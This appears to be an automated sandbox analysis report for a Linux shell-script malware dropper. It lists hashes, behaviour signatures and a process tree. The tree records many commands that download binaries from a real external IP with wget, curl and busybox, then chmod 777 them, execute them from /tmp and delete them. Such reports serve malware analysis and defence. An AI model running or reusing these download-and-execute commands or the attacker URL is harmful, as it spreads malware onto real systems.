Analysis
-
max time kernel
82s -
max time network
84s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
-
Size
10KB
-
MD5
9498e3b84daf1f4fc7db572ea81ea29a
-
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
-
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
-
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
-
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:739
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:746
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:752
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:774
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:802
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:815
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:824
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:836
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:862
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:872
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:878
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:884
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:890
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:896
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:902
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:908
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:914
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:920
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:926
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:932
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:938
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:944
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:950
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:956
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:962
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:968
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:974
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:980
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97